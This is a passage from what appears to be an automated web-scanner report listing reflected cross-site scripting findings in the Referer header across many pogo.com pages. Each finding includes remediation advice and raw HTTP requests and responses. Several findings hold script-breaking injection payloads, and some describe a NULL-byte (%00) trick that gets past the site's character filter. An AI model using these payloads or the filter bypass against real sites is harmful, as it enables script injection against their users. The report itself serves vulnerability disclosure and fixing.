Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /login/entry.jsp?site Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=DBFBE7E5DB2 |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:52:44 GMT Server: Apache-Coyote/1.1 Content-Length: 35235 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.688. http://www.pogo.com/login/pogo/setCookie.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /login/pogo/setCookie.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61995</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.site=pogo; prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:54:02 GMT Server: Apache-Coyote/1.1 Content-Length: 35353 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.689. http://www.pogo.com/login/word-verification.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /login/word-verification |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a239f</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /login/word-verification Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.site=pogo; prod.JID=269399119AD |
Response
HTTP/1.1 404 Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:52:10 GMT Server: Apache-Coyote/1.1 Content-Length: 3799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.690. http://www.pogo.com/news/us/latestnews/news-2010.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /news/us/latestnews/news |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7e2</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /news/us/latestnews/news Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:58:35 GMT Server: Apache-Coyote/1.1 Content-Length: 36967 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pogo: Communit ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo News Latest Archive"; s.prop2="pogo"; s.channel="news"; s.prop7="POGO:news s.prop8="Non Authenticated"; if (ty ...[SNIP]... |
3.691. http://www.pogo.com/news/us/netiquette/net-2009.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /news/us/netiquette/net |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83883</script>fce9da87ffa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /news/us/netiquette/net Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:01 GMT Server: Apache-Coyote/1.1 Content-Length: 38538 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pogo: Communit ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo News Ms. Netiquette Archive"; s.prop2="pogo"; s.channel="news"; s.prop7="POGO:news s.prop8="Non Authen ...[SNIP]... |
3.692. http://www.pogo.com/news/us/winnerscircle/winners-2010.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /news/us/winnerscircle |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89060</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /news/us/winnerscircle Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:58:35 GMT Server: Apache-Coyote/1.1 Content-Length: 32773 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pogo: Communit ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo News Winners Circle"; s.prop2="pogo"; s.channel="news"; s.eVar18="un_free_home s.prop7="POGO:news ...[SNIP]... |
3.693. http://www.pogo.com/prize/prize.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /prize/prize.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 984d2</script>6545c68478a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /prize/prize.do HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: 984d2</script>6545c68478a |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:56:47 GMT Server: Apache-Coyote/1.1 Content-Length: 25500 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... tIdentifier; s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="984d2</script>6545c68478a"; s.eVar2="pogo"; s.pageName="Pogo Prize Page"; s.prop2="pogo"; s.channel="prizes"; s.prop7="POGO:prizes s.prop8="Non Authenticated"; if (typeof(omniture_ja ...[SNIP]... |
3.694. http://www.pogo.com/prize/prize.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /prize/prize.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93d27</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /prize/prize.do Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:18 GMT Server: Apache-Coyote/1.1 Content-Length: 25597 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Prize Page"; s.prop2="pogo"; s.channel="prizes"; s.eVar18="un_header s.prop7="POGO:prizes s.prop8="Non Authentic ...[SNIP]... |
3.695. http://www.pogo.com/prize/rules.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /prize/rules.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf0b3</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /prize/rules.do HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: cf0b3</script><script |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:57:57 GMT Server: Apache-Coyote/1.1 Content-Length: 35490 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... tIdentifier; s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="cf0b3</script><script s.eVar2="pogo"; s.pageName="Pogo Prize Page"; s.prop2="pogo"; s.channel="prizes"; s.prop7="POGO:prizes s.prop8="Non Authenticated"; if (typeof(omniture_ja ...[SNIP]... |
3.696. http://www.pogo.com/profiles/k7240 [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /profiles/k7240 |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006a5b9</script><aThis behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /profiles/k7240 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:08 GMT Server: Apache-Coyote/1.1 Content-Length: 37970 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Free Pogo Full Profile"; s.prop2="pogo"; s.channel="friends"; s.prop7="POGO:friends:: s.prop8="Non Authenticated"; if (typeof(o ...[SNIP]... |
3.697. http://www.pogo.com/puzzle-games [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /puzzle-games |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e38</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /puzzle-games?pageSection Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: 38e38</script><script |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:56 GMT Server: Apache-Coyote/1.1 Content-Length: 106902 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... tIdentifier; s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="38e38</script><script s.eVar2="pogo"; s.pageName="Unauth Category Page filter - puzzle"; s.prop2="pogo"; s.channel="games"; s.eVar18="un_categorybar s.prop7="POGO:games ...[SNIP]... |
3.698. http://www.pogo.com/puzzle-games [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /puzzle-games |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087a19</scriptThis behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /puzzle-games HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:45 GMT Server: Apache-Coyote/1.1 Content-Length: 106836 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - puzzle"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games s.pr ...[SNIP]... |
3.699. http://www.pogo.com/sitemap [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /sitemap |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b03fe</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /sitemap HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:58:43 GMT Server: Apache-Coyote/1.1 Content-Length: 56255 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.pageName="Pogo Sitemap Page"; s.prop7="::::Pogo Sitemap Page:Non Authenticated"; s.prop8="Non Authenticated"; if (typeof(omniture_java ...[SNIP]... |
3.700. http://www.pogo.com/word-games [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /word-games |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e93c</script>9a2837e5673 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /word-games?pageSection Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:55 GMT Server: Apache-Coyote/1.1 Content-Length: 106163 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - word"; s.prop2="pogo"; s.channel="games"; s.eVar18="un_footer_word" s.prop7="POGO:games ...[SNIP]... |
3.701. http://www.pogo.com/word-games [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /word-games |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd5</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
